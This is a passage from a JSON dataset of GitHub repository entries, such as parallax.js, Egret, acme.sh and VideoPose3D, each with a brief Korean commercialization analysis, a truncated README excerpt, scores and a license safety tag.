\n[干货集中营](http://gank.io/)&nbsp;&nbsp;—&nbsp;&nbsp;或许是国内第三方客户端最多的干货分享地，内含福利  \n[稀土掘金](https://gold.xitu.io/)&nbsp;&nbsp;—&nbsp;&nbsp;目前最火热的技术分发平台  \n[V2EX](https://www.v2ex.com/)&nbsp;&nbsp;—&nbsp;&nbsp;一个关于分享和探索的地方，创意工作者们的社区  \n<br/>\n<b>tips:</b>  \n\n* 本项目还在测试阶段，发现bug或有好的建议欢迎[issue](https://github.com/codeestX/GeekNews/issues)、email(codeest.dev@gmail.com)、PR\n* IDE提示缺少Dagger开头的Class直接编译即可，会由Dagger2自动生成\n* 本项目仅做学习交流使用，API数据内容所有权归原作公司所有，请勿","composite_score":0.3328,"license_safety_tag":"unknown"},{"name":"pixelcog/parallax.js","github_url":"https://github.com/pixelcog/parallax.js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":49,"description":"# pixelcog/parallax.js 분석\n\n## 왜 보물인가\n웹사이트에서 마우스를 움직일 때 배경이 다르게 움직이는 시각적 효과를 만드는 기술로, 사용자에게 깊이감 있는 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **포트폴리오 웹사이트 SaaS**: 디자이너/개발자가 이 효과를 자동으로 추가할 수 있는 웹빌더 서비스\n2. **마케팅 에이전시 ","readme_excerpt":"Parallax.js\n===========\n\nSimple parallax scrolling implemented as a jQuery plugin.  \n[http://pixelcog.com/parallax.js/](http://pixelcog.com/parallax.js/)\n\n\nPlease also check our [v2.0.0-alpha](https://github.com/pixelcog/parallax.js/tree/v2.0.0-alpha)! We'd be happy to receive your feedback!\n\n**ATTENTION:** please use the issue tracker for bug reports and feature requests ONLY! For questions and topics which go along the lines \"I cannot get this to work\" please turn to [stackoverflow.com](https://stackoverflow.com/questions/tagged/parallax.js) for help and use the tag [parallax.js](https://stackoverflow.com/questions/tagged/parallax.js). Thank you for your understanding!\n\n\n## Installation\n\n### NPM\n\n```bash\nnpm i --save jquery-parallax.js\n```\n\n### Yarn\n\n```bash\nyarn add jquery-parallax.js\n```\n\n### Bower\n\nPlease note that although Bower is still maintained, they recommend Yarn for new projects.\n\n```bash\n$ bower i --save parallax.js\n```\n\n### Setup\n\nInclude `parallax.min.js` in your docume","composite_score":0.3327,"license_safety_tag":"safe"},{"name":"egret-labs/egret-core","github_url":"https://github.com/egret-labs/egret-core","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":47,"description":"# Egret Core 상용화 분석 보고서\n\n## 왜 보물인가\n게임과 앱 개발에 필요한 핵심 기반 기술을 제공하여, 개발자들이 처음부터 만들지 않고 바로 사용할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 게임 개발 플랫폼으로, 누구나 로그인해서 게임을 만들 수 있는 온라인 도구\n2. **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\r\n    <img src=\"./docs/img/egret_logo.jpg\"\r\n         height=\"130\">\r\n</p>\r\n<p align=\"center\">\r\n    <a href=\"https://github.com/egret-labs/egret-core/network\">\r\n        <img src=\"https://img.shields.io/github/forks/egret-labs/egret-core.svg\"\r\n             alt=\"forks\">\r\n    </a>\r\n    <a href=\"https://github.com/egret-labs/egret-core/stargazers\">\r\n        <img src=\"https://img.shields.io/github/stars/egret-labs/egret-core.svg\"\r\n             alt=\"stars\">\r\n    </a>\r\n    <a href=\"https://github.com/egret-labs/egret-core\">\r\n        <img src=\"https://img.shields.io/badge/version-5.4.1-green.svg\"\r\n             alt=\"version\">\r\n    </a>\r\n    <a href=\"./LICENSE.md\">\r\n        <img src=\"https://img.shields.io/badge/license-New%20BSD-blue.svg\"\r\n             alt=\"license\">\r\n    </a>\r\n</p>\r\n\r\n[EN](README.md) / [CN](README_CN.md)\r\n\r\n# Egret Engine\r\n\r\nThe Egret Engine is a HTML5 game engine. It provides modules to handle common game development tasks such as 2D and 3D rendering, GUI syst","composite_score":0.3325,"license_safety_tag":"unknown"},{"name":"seanseany/blockchain","github_url":"https://github.com/seanseany/blockchain","stars":10,"language":"JavaScript","license":"unknown","abandonment_months":35,"description":"# seanseany/blockchain 상용화 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심 원리를 직접 구현한 코드로, 암호화폐나 디지털 자산 시스템을 만들고 싶은 사람들의 학습 및 개발 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 거래 기록 투명성 검증 시스템으로 제공 (금융/공급망 기업 대상)\n2. **내","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://blockchaindemo.io\" rel=\"noopener noreferrer\" target=\"_blank\"><img src=\"https://raw.githubusercontent.com/seanseany/blockchain/master/logo.png\" width=\"200\"></a>\n  <br>\n    <a href=\"https://blockchaindemo.io\" rel=\"noopener noreferrer\" target=\"_blank\">Blockchaindemo.io</a>\n  <br>\n</h1>\n\n<h4 align=\"center\">Code for learning the blockchain data structure</h4>\n\n<br>\n\n## 📦 Installation\n\nTo install this application, you'll need\n[Node.js](https://nodejs.org/en/download/) 7+ (which comes with\n[npm](http://npmjs.com)) installed on your computer. From your command line:\n\n#### Source\n\nYou'll need [Git](https://git-scm.com) to run the project from source. From your\ncommand line:\n\n```bash\n# Clone this repository\n$ git clone https://github.com/seanseany/blockchain\n\n# Go into the repository\n$ cd blockchain\n\n# Install dependencies\n$ npm install\n\n# Run the app\n$ npm start\n```\n\n## ℹ️ FAQ\n\n#### When or why I would use this?\n\nYou should use this if you want to b","composite_score":0.3325,"license_safety_tag":"unknown"},{"name":"floydhub/dl-docker","github_url":"https://github.com/floydhub/dl-docker","stars":6,"language":"Python","license":"unknown","abandonment_months":82,"description":"# floydhub/dl-docker 평가 분석\n\n## 왜 보물인가\n인공지능 학습에 필요한 복잡한 환경 설정을 한 번에 해결해주는 도구라서, 데이터 분석가나 연구자들의 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 인공지능 학습 과정에 사전 구성된 환경을 제공하여 학생들이 설치 없이 바로 공부할 수 있게 함\n","readme_excerpt":"[Website](https://www.floydhub.com) • [Docs](https://docs.floydhub.com) • [Forum](https://forum.floydhub.com) • [Twitter](https://twitter.com/floydhub_) • [We're Hiring](https://angel.co/floydhub)\n\n[![FloydHub Logo](https://github.com/floydhub/static/blob/master/Group.png)](https://www.floydhub.com)\n\n## All-in-one Docker image for Deep Learning\nHere are Dockerfiles to get you up and running with a fully functional deep learning machine. It contains all the popular deep learning frameworks with CPU and GPU support (CUDA and cuDNN included). The CPU version should work on Linux, Windows and OS X. The GPU version will, however, only work on Linux machines. See [OS support](#what-operating-systems-are-supported) for details\n\nIf you are not familiar with Docker, but would still like an all-in-one solution, start here: [What is Docker?](#what-is-docker). If you know what Docker is, but are wondering why we need one for deep learning, [see this](#why-do-i-need-a-docker)\n\n## Update: I've built","composite_score":0.3323,"license_safety_tag":"unknown"},{"name":"Neilpang/acme.sh","github_url":"https://github.com/Neilpang/acme.sh","stars":8,"language":"Shell","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://zerossl.com/?fromacme.sh\">\n    <img src=\"https://github.com/user-attachments/assets/7531085e-399b-4ac2-82a2-90d14a0b7f05\" alt=\"zerossl.com\">\n  </a>\n</p>\n\n<h1 align=\"center\">🔐 acme.sh</h1>\n<h3 align=\"center\">An ACME Protocol Client Written Purely in Shell</h3>\n\n<p align=\"center\">\n  <a href=\"https://github.com/acmesh-official/acme.sh/actions/workflows/FreeBSD.yml\"><img src=\"https://github.com/acmesh-official/acme.sh/actions/workflows/FreeBSD.yml/badge.svg\" alt=\"FreeBSD\"></a>\n  <a href=\"https://github.com/acmesh-official/acme.sh/actions/workflows/OpenBSD.yml\"><img src=\"https://github.com/acmesh-official/acme.sh/actions/workflows/OpenBSD.yml/badge.svg\" alt=\"OpenBSD\"></a>\n  <a href=\"https://github.com/acmesh-official/acme.sh/actions/workflows/NetBSD.yml\"><img src=\"https://github.com/acmesh-official/acme.sh/actions/workflows/NetBSD.yml/badge.svg\" alt=\"NetBSD\"></a>\n  <a href=\"https://github.com/acmesh-official/acme.sh/actions/workflows/MacOS.yml\"><img src","composite_score":0.332,"license_safety_tag":"restricted"},{"name":"fossasia/giggity","github_url":"https://github.com/fossasia/giggity","stars":11,"language":"C","license":"Apache-2.0","abandonment_months":11,"description":"# Giggity 프로젝트 분석\n\n## 왜 보물인가\n행사나 컨퍼런스의 참가자 정보를 효율적으로 관리할 수 있는 오픈소스 플랫폼으로, 조직이 자체 서버에서 운영하며 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 관리 SaaS**: 중소 컨퍼런스나 세미나 주최사에 참가자 등록/일정관리 시스템으로 제공\n2. **내부 업무 도구**: IT ","readme_excerpt":"# Magic Epaper Firmware\n\n**Magic Epaper Firmware** is a customizable and efficient firmware designed to control FOSSASIA's epaper displays. This project is ideal for applications such as smart signage, dashboards, IoT devices, and more, providing a seamless interface for rendering content on e-ink screens.\n\n## Features\n\n- **Optimized for the FOSSSASIA epaper Display**: Smooth rendering with minimal power consumption.\n- **Modular Codebase**: Easy to customize for different e-paper display sizes and types.\n- **Low-Power Operations**: Designed for battery-powered devices.\n- **Flexible Connectivity**:\n  - Supports communication over SPI, I2C, or UART.\n  - Compatible with the following microcontroller\n- **Rich Content Rendering**:\n  - Text, images, and custom graphics.\n  - Support for grayscale and partial refresh (depending on the display).\n- **Open Source**: Fully open-source firmware under the Apache2 license.\n\n## Supported Displays\n\nThe firmware currently supports the following e-ink di","composite_score":0.332,"license_safety_tag":"safe"},{"name":"willowtreeapps/Hyperion-iOS","github_url":"https://github.com/willowtreeapps/Hyperion-iOS","stars":10,"language":"Objective-C","license":"MIT","abandonment_months":2,"description":"# Hyperion-iOS 상업화 분석\n\n## 왜 보물인가\niPhone 앱 개발 시 실수를 자동으로 찾아주고 고쳐주는 도구로, 앱 품질을 빠르게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업 개발팀이 월 구독으로 이용하는 '앱 검사 자동화 플랫폼' (Slack/Teams 연동 가능)\n2. **내부 업무 도구**:","readme_excerpt":"# Hyperion\n\n[![Platform](https://img.shields.io/cocoapods/p/HyperioniOS.svg?style=flat)](http://cocoapods.org/pods/HyperioniOS)\n[![License](https://img.shields.io/cocoapods/l/HyperioniOS.svg?style=flat)](http://cocoapods.org/pods/HyperioniOS)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Version](https://img.shields.io/cocoapods/v/HyperioniOS.svg?style=flat)](http://cocoapods.org/pods/HyperioniOS)\n[![CI Status](https://circleci.com/gh/willowtreeapps/Hyperion-iOS.svg?style=shield)](https://circleci.com/gh/willowtreeapps/Hyperion-iOS)\n![Hyperion Logo](https://github.com/willowtreeapps/Hyperion-ios/raw/master/Img/Hyperion-Logo.png)\n\n# Hyperion - In App Design Review Tool\n\n## What is it?\n\n<p align=\"center\" id=\"Hyperion Drawer\">\n  <img src=\"https://media.giphy.com/media/l4Ep2JJ27OngKOrmM/giphy.gif\" />\n</p>\n\nHyperion is a hidden plugin drawer that can easily be integrated into any app. The drawer sits","composite_score":0.3317,"license_safety_tag":"safe"},{"name":"picturepan2/spectre","github_url":"https://github.com/picturepan2/spectre","stars":5,"language":"CSS","license":"mit","abandonment_months":26,"description":"# picturepan2/spectre 평가 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 기본 디자인 도구모음으로, 복잡한 작업 없이 깔끔한 웹사이트를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 자신들의 제품 소개 페이지나 관리 대시보드를 빠르게 구축하는 데 사용\n2. **내부 업무 도구**: 기","readme_excerpt":"<a href=\"https://picturepan2.github.io/spectre\">\n  <img src=\"https://picturepan2.github.io/spectre/img/spectre-logo.svg\" width=\"72\" height=\"72\">\n</a>\n\n## Spectre.css\n\n[![Reviewed by Hound](https://img.shields.io/badge/Reviewed_by-Hound-8E64B0.svg)](https://houndci.com)\n\nSpectre.css is a lightweight, responsive and modern CSS framework.\n\n- Lightweight (~10KB gzipped) starting point for your projects\n- Flexbox-based, responsive and mobile-friendly layout\n- Elegantly designed and developed elements and components\n\nSpectre is a side project based on years of CSS development work on a large web service project. Spectre only includes modern base styles, responsive layout system, CSS components and utilities, and it can be modified for your project with Sass/Scss compiler.\n\nSpectre.css is completely free to use. If you enjoy it, please consider [donating via Paypal](https://www.paypal.me/picturepan2) or [via Patreon](https://www.patreon.com/spectrecss) for the further development. ♥ \n\n\n## Get","composite_score":0.3316,"license_safety_tag":"safe"},{"name":"chrisvfritz/vue-2.0-simple-routing-example","github_url":"https://github.com/chrisvfritz/vue-2.0-simple-routing-example","stars":5,"language":"Vue","license":"unknown","abandonment_months":72,"description":"# vue-2.0-simple-routing-example 분석\n\n## 왜 보물인가\n웹사이트에서 여러 페이지를 자유롭게 오갈 수 있게 해주는 기초 기술을 아주 단순하게 구현한 교육용 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원 대시보드, 설정 페이지, 결제 화면 등을 연결하는 웹 애플리케이션\n- **내부 업무 도구**: 직원 관","readme_excerpt":"# Vue 2.0 Simple Routing Example\n\n> A simple example of routing with Vue 2.0 without using vue-router. This branch uses the raw HTML5 History API. For an example integrating a 3rd-party routing solution, see the [pagejs branch](https://github.com/chrisvfritz/vue-2.0-simple-routing-example/tree/pagejs).\n\n## Build Setup\n\n``` bash\n# install dependencies\nnpm install\n\n# serve with hot reload at localhost:8080\nnpm run dev\n\n# build for production with minification\nnpm run build\n```\n\nFor a detailed explanation of the build process, read the [docs for vue-loader](http://vuejs.github.io/vue-loader).\n","composite_score":0.3315,"license_safety_tag":"unknown"},{"name":"mocheng/react-and-redux","github_url":"https://github.com/mocheng/react-and-redux","stars":5,"language":"JavaScript","license":"mit","abandonment_months":95,"description":"# mocheng/react-and-redux 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 두 가지 핵심 기술(React와 Redux)을 한 번에 배울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: React와 Redux 강좌를 판매하는 구독형 학습 서비스로 운영\n2. **회사 내부 교육**: IT ","readme_excerpt":"# react-and-redux\n\n《深入浅出React和Redux》已近由机械工业出版社发行，这个repo存放的是书中所有的代码。\n\n配合React和Redux的持续讨论，作者开通了一个知乎专栏[《进击的React》](https://zhuanlan.zhihu.com/advancing-react)，欢迎关注。对React和Redux技术有问题可以[通过私信或者值乎咨询](https://www.zhihu.com/zhi/people/828707098316656640)，有问必答。\n\n[京东](http://item.jd.com/12073933.html)（这个链接里有书的目录）\n\n[亚马逊](https://www.amazon.cn/%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BAReact%E5%92%8CRedux-%E7%A8%8B%E5%A2%A8/dp/B072BM636Z/ref=sr_1_1?ie=UTF8&qid=1494646329&sr=8-1&keywords=%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BAreact%E5%92%8Credux)\n\n[当当网](http://product.dangdang.com/25072226.html)\n\n![cover_high](https://cloud.githubusercontent.com/assets/239291/25560742/c3199d9a-2d8e-11e7-81a9-4e11c518e512.jpg)\n\n\n\n","composite_score":0.3315,"license_safety_tag":"safe"},{"name":"facebookresearch/VideoPose3D","github_url":"https://github.com/facebookresearch/VideoPose3D","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":42,"description":"# VideoPose3D 상용화 분석\n\n## 왜 보물인가\n2차원 영상에서 사람의 3차원 골격(뼈대) 위치를 자동으로 인식하는 기술로, 스포츠 분석부터 재활 운동 지도까지 다양한 산업에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 피트니스 SaaS**\n스마트폰 카메라로 운동 자세를 실시간 분석하고 자동 피드백을 주는 AI 운동 코치 앱","readme_excerpt":"# 3D human pose estimation in video with temporal convolutions and semi-supervised training\n<p align=\"center\"><img src=\"images/convolutions_anim.gif\" width=\"50%\" alt=\"\" /></p>\n\nThis is the implementation of the approach described in the paper:\n> Dario Pavllo, Christoph Feichtenhofer, David Grangier, and Michael Auli. [3D human pose estimation in video with temporal convolutions and semi-supervised training](https://arxiv.org/abs/1811.11742). In Conference on Computer Vision and Pattern Recognition (CVPR), 2019.\n\nMore demos are available at https://dariopavllo.github.io/VideoPose3D\n\n<p align=\"center\"><img src=\"images/demo_yt.gif\" width=\"70%\" alt=\"\" /></p>\n\n![](images/demo_temporal.gif)\n\n### Results on Human3.6M\nUnder Protocol 1 (mean per-joint position error) and Protocol 2 (mean-per-joint position error after rigid alignment).\n\n| 2D Detections | BBoxes | Blocks | Receptive Field | Error (P1) | Error (P2) |\n|:-------|:-------:|:-------:|:-------:|:-------:|:-------:|\n| CPN | Mask R-CNN ","composite_score":0.3315,"license_safety_tag":"unknown"},{"name":"saenzramiro/rambox","github_url":"https://github.com/saenzramiro/rambox","stars":6,"language":"JavaScript","license":"gpl-3.0","abandonment_months":50,"description":"# Rambox 저장소 분석\n\n## 왜 보물인가\n여러 메신저와 이메일을 하나의 창에서 통합 관리할 수 있는 생산성 도구로, 직장인들의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- Rambox 클라우드 버전: 월 구독으로 언제 어디서나 계정과 설정을 동기화하는 서비스\n\n**2. 내부 업무 도구**\n- 대형","readme_excerpt":"# EOL\nThe Community Edition of Rambox is no longer maintained. We highly recommend that you update to the new version of Rambox, which has a FREE plan with all the features you already use and much more!\n\nVisit: https://rambox.app/download\n\nThank you so much for all the users who contribute to this project all these years.\n\n[Read our blog post to know more about our new Rambox.](https://rambox.medium.com/hello-2022-hello-new-rambox-4bdef5d6c3b8)\n\n---\n\n<div align=\"center\">\n  <h1>\n    <br />\n    <a href=\"https://rambox.pro\"><img src=\"./resources/Icon.png\" width=\"256px\" alt=\"Rambox\" /></a><br />\n    Rambox CE\n    <br /><br/>\n  </h1>\n\n  <h4>Free, Open Source and Cross Platform messaging and emailing app that combines common web applications into one.</h4>\n\n  <p>\n    <a href=\"https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=WU75QWS7LH2CA\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Donate-PayPal-green.svg\" alt=\"Donate with PayPal\" /></a>\n    <a href=\"https://w","composite_score":0.3314,"license_safety_tag":"restricted"},{"name":"deepmind/graph_nets","github_url":"https://github.com/deepmind/graph_nets","stars":16,"language":"Python","license":"apache-2.0","abandonment_months":42,"description":"# DeepMind Graph Nets 분석\n\n## 왜 보물인가\n복잡한 데이터의 연결 관계를 컴퓨터가 이해하고 학습하게 해주는 구글 DeepMind의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **추천 시스템 SaaS**: 고객 간 구매 패턴의 연결을 분석해 개인화된 상품 추천 서비스 제공\n2. **분자 구조 분석 API**: 신약 개발사에 화학 ","readme_excerpt":"![Graph Nets DeepMind shortest path](https://github.com/deepmind/graph_nets/raw/master/images/graph-nets-deepmind-shortest-path0.gif)\n\n# Graph Nets library\n\n[Graph Nets](https://github.com/deepmind/graph_nets) is DeepMind's library for\nbuilding graph networks in Tensorflow and Sonnet.\n\nContact graph-nets@google.com for comments and questions.\n\n#### What are graph networks?\n\nA graph network takes a graph as input and returns a graph as output. The input\ngraph has edge- (*E* ), node- (*V* ), and global-level (**u**) attributes. The\noutput graph has the same structure, but updated attributes. Graph networks are\npart of the broader family of \"graph neural networks\" (Scarselli et al., 2009).\n\nTo learn more about graph networks, see our arXiv paper: [Relational inductive\nbiases, deep learning, and graph networks](https://arxiv.org/abs/1806.01261).\n\n![Graph network](https://github.com/deepmind/graph_nets/raw/master/images/graph-network.png)\n\n## Installation\n\nThe Graph Nets library can be inst","composite_score":0.3314,"license_safety_tag":"safe"},{"name":"fiorix/freegeoip","github_url":"https://github.com/fiorix/freegeoip","stars":5,"language":"Go","license":"NOASSERTION","abandonment_months":46,"description":"# freegeoip 저장소 분석\n\n## 왜 보물인가\n사용자의 인터넷 주소(IP)로부터 위치 정보를 자동으로 찾아주는 기술로, 배송 주소 자동입력이나 사기 탐지 같은 실생활 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 고객의 위치를 자동으로 감지하여 배송료 계산 및 지역별 상품 추천\n2. **내부 업무 도구**: ","readme_excerpt":"# freegeoip\n\n**NOTE:** as of April 2018 this repository is no longer active. Please visit https://github.com/apilayer/freegeoip/ for the current version.\n\n---\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)\n\nThis is the source code of the freegeoip software. It contains both the web server that empowers freegeoip.net, and a package for the [Go](http://golang.org) programming language that enables any web server to support IP geolocation with a simple and clean API.\n\nSee http://en.wikipedia.org/wiki/Geolocation for details about geolocation.\n\nDevelopers looking for the Go API can skip to the [Package freegeoip](#packagefreegeoip) section below.\n\n## Running\n\nThis section is for people who desire to run the freegeoip web server on their own infrastructure. The easiest and most generic way of doing this is by using Docker. All examples below use Docker.\n\n### Docker\n\n#### Install Docker\n\nDocker has [install instructions for many platforms](https://docs.d","composite_score":0.3313,"license_safety_tag":"unknown"},{"name":"moxiecode/plupload","github_url":"https://github.com/moxiecode/plupload","stars":6,"language":"JavaScript","license":"agpl-3.0","abandonment_months":23,"description":"# Plupload 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 여러 파일을 한 번에 빠르게 업로드할 수 있게 해주는 오픈소스 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 SaaS**: 구글 드라이브나 드롭박스 같은 파일 공유 서비스에 빠른 다중 파일 업로드 기능 추가\n2. **내부 업무 도구**: ","readme_excerpt":"# Plupload\n\nPlupload is a cross-browser multi-runtime file uploading API. Basically, a set of tools that will help you to\nbuild a reliable and visually appealing file uploader in minutes.\n\nHistorically, Plupload comes from a dark and hostile age of no HTML5, hence all the alternative fallbacks,\nlike Flash, Silverlight and Java (still in development). It is meant to provide an API, that\nwill work anywhere and in any case, in one way or another. While having very solid fallbacks, Plupload\nis built with the future of HTML5 in mind.\n\n### Table of Contents\n* [Backstory](#backstory)\n* [Structure](#structure)\n  * [File API and XHR L2 pollyfills](https://github.com/moxiecode/moxie/blob/master/README.md)\n  * [Plupload API](https://github.com/moxiecode/plupload/wiki/API)\n  * [UI Widget](https://github.com/moxiecode/plupload/wiki/UI.Plupload)\n  * [Queue Widget](https://github.com/moxiecode/plupload/wiki/pluploadQueue)\n* [Demos](https://github.com/jayarjo/plupload-demos/blob/master/README.md)\n* [B","composite_score":0.3312,"license_safety_tag":"risky"},{"name":"malcommac/SwiftDate","github_url":"https://github.com/malcommac/SwiftDate","stars":6,"language":"Swift","license":"mit","abandonment_months":33,"description":"# SwiftDate 프로젝트 분석\n\n## 왜 보물인가\niPhone, iPad 등 Apple 기기에서 날짜와 시간을 쉽게 다루는 도구로, 모바일 앱 개발자들의 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 예약 관리 앱, 달력 동기화 플랫폼, 업무 일정 관리 시스템에 핵심 기능으로 판매\n2. **내부 업무","readme_excerpt":"<p align=\"center\" >\n  <img src=\"banner.png\" width=300px alt=\"SwiftDate\" title=\"SwiftDate\">\n</p>\n\n<p align=\"center\"><strong>Toolkit to parse, validate, manipulate, compare and display dates, time & timezones in Swift.</strong></p>\n\n## What's This?\n\nSwiftDate is the **definitive toolchain to manipulate and display dates and time zones** on all Apple platform and even on Linux and Swift Server Side frameworks like Vapor or Kitura.  \n**Over 3 million of downloads on [CocoaPods](https://cocoapods.org/pods/SwiftDate).**\n\nFrom simple date manipulation to complex business logic SwiftDate maybe the right choice for your next project.\n\n- [x] **Easy Date Parsing** (custom formats, iso8601, rss & many more)\n- [x] **Easy Date Formatting** even with colloquial formatter and 140+ supported languages\n- [x] **Easy math operations with time units** (`2.hours + 5.minutes`...)\n- [x] **Intuitive components extraction** (`day, hour, nearestHour, weekdayNameShort` etc.)\n- [x] **Derivated dates generation** (","composite_score":0.3311,"license_safety_tag":"safe"},{"name":"apollographql/react-apollo","github_url":"https://github.com/apollographql/react-apollo","stars":5,"language":"JavaScript","license":"mit","abandonment_months":38,"description":"# React-Apollo 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 서버와 데이터를 주고받을 때 필요한 핵심 도구로, 개발자들이 복잡한 데이터 관리를 간단하게 할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **실시간 협업 SaaS**: 문서 편집, 프로젝트 관리 도구처럼 여러 사용자의 데이터를 실시간으로 동기화해야 하는 서비스\n- **내부","readme_excerpt":"# <a href=\"https://www.apollographql.com/\"><img src=\"https://user-images.githubusercontent.com/841294/53402609-b97a2180-39ba-11e9-8100-812bab86357c.png\" height=\"100\" alt=\"React Apollo\"></a>\n\n## React Apollo\n\n[![npm version](https://badge.fury.io/js/react-apollo.svg)](https://badge.fury.io/js/react-apollo)\n[![Build Status](https://circleci.com/gh/apollographql/react-apollo.svg?style=svg)](https://circleci.com/gh/apollographql/react-apollo)\n[![Join the community on Spectrum](https://withspectrum.github.io/badge/badge.svg)](https://spectrum.chat/apollo)\n\n---\n\n⚠️ **THIS PROJECT HAS BEEN DEPRECATED** ⚠️\n\nPlease note that 4.0.0 is the final version of all React Apollo packages. React Apollo functionality is now directly available from `@apollo/client` >= 3. While using the `@apollo/react-X` packages will still work, we recommend using the following imports from `@apollo/client` directly instead:\n>\n> - old: `@apollo/react-components` --> new: `@apollo/client/react/components`\n> - old: `@apoll","composite_score":0.3308,"license_safety_tag":"safe"},{"name":"ryanhoo/StylishMusicPlayer","github_url":"https://github.com/ryanhoo/StylishMusicPlayer","stars":5,"language":"Java","license":"unknown","abandonment_months":73,"description":"# StylishMusicPlayer 상용화 분석\n\n## 왜 보물인가\n예쁜 디자인의 음악 재생 앱으로, 스마트폰이나 컴퓨터에서 음악을 듣는 경험을 더 멋지게 만들어줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 서비스**: 스포티파이, 멜론 같은 음악 앱에 이 플레이어 디자인을 적용하여 사용자 경험 개선\n2. **팟캐스트 청취 앱**: ","readme_excerpt":"# A Stylish Music Player\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/ryanhoo/StylishMusicPlayer#license)\n[![platform](https://img.shields.io/badge/platform-Android-yellow.svg)](https://www.android.com)\n[![API](https://img.shields.io/badge/API-16%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=16)\n[![gitter](https://img.shields.io/gitter/room/nwjs/nw.js.svg)](https://gitter.im/stylist-music-player/bug-report)\n[![PRs Welcome](https://img.shields.io/badge/prs-welcome-brightgreen.svg)](http://makeapullrequest.com)\n\n![Artboard](materials/Artboard.png)\n\n## TODO\n\n- Lyric Support\n- Settings\n\n## Acknowledgements\n\nThanks to these projects and libraries:\n\n**Libraries**\n\n- [RxJava](https://github.com/ReactiveX/RxJava)\n- [RxAndroid](https://github.com/ReactiveX/RxAndroid)\n- [Retrofit](https://github.com/square/retrofit)\n- [Butter Knife](https://github.com/JakeWharton/butterknife)\n- [Calligraphy](https://github.com/chrisjenx/Calligraphy)\n","composite_score":0.3307,"license_safety_tag":"unknown"},{"name":"popovbodya/Garbage-collector","github_url":"https://github.com/popovbodya/Garbage-collector","stars":8,"language":"Kotlin","license":"unknown","abandonment_months":46,"description":"","readme_excerpt":"[![Build Status](https://travis-ci.com/popovbodya/Garbage-collector.svg?branch=master)](https://travis-ci.com/popovbodya/Garbage-collector)\n\n![Challenge Promo](assets/promo.gif)\n\n# Garbage-collector\nAn easy way to make world cleaner\n\n## About app: \nWe want to provide users with the opportunity to correctly detect types of waste with information about the available types of disposal, depending on the location of the person. The application recognizes the object on the screen and tells you how and where it is more convenient to dispose it.\n\n![How it works](assets/showcase.png)\n\n\n## Cover letter\nComplete cover letter for this project you can find \n[here](https://github.com/popovbodya/Garbage-collector/blob/master/Cover%20Letter.pdf)\n\n\n## Our team\nWe are a team of enthusiasts from Russia.\nWe love technology and want to make the world a bit cleaner.\n\n![Our team](assets/team.png)\n","composite_score":0.3306,"license_safety_tag":"unknown"},{"name":"chastis/UniversityStuff","github_url":"https://github.com/chastis/UniversityStuff","stars":10,"language":"C++","license":"unknown","abandonment_months":42,"description":"","readme_excerpt":"# University\n\n\n<a href = \"https://t.me/sheva_quotes\"><img src=\"sheva_quotes.png\" width=\"200\"></a> | <i> Make yourself <br> at your repository </i>\n--|--\n<hr>\n<table>\n<tr > \n<th>Course 1</th>\n<th>Course 2</th>\n<th>Course 3</th>\n<th>Course 4</th>\n</tr> \n<tr >\n<tr >\n<td valign=\"top\">\n \n  * [Semester 1](https://github.com/chastis/UniversityStuff)\n  * [Semester 2](https://github.com/chastis/UniversityStuff/tree/master/Semester_2)\n    * [Custom List](https://github.com/chastis/UniversityStuff/tree/master/Semester_2/MyList)\n    * [Custom Sort](https://github.com/chastis/UniversityStuff/tree/master/Semester_2/MySort)\n    * [Final Test](https://github.com/chastis/UniversityStuff/tree/master/Semester_2/TestOOP2)\n       \n<td valign=\"top\">\n  \n  * [Semester 3](https://github.com/chastis/UniversityStuff/tree/master/Semester_3)\n    * [Algorithms](https://github.com/chastis/UniversityStuff/tree/master/Semester_3/Algorithms)\n    * 